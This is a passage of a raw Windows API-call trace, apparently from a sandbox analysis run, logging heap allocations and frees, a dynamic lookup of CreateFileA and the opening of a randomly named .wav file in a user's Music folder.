hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.804] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.807] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9f70 [0181.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9f70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0181.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.808] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0181.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0181.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0181.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.809] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0181.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0181.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", cchWideChar=87, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0181.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x57) returned 0x8c4a48 [0181.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", cchWideChar=87, lpMultiByteStr=0x8c4a48, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpUsedDefaultChar=0x0) returned 87 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.811] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\cxrsn5dptydsim.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0181.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=87, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xae) returned 0x8e6cd8 [0181.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=87, lpWideCharStr=0x8e6cd8, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav") returned 87 [0181.813] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0181.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.815] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: 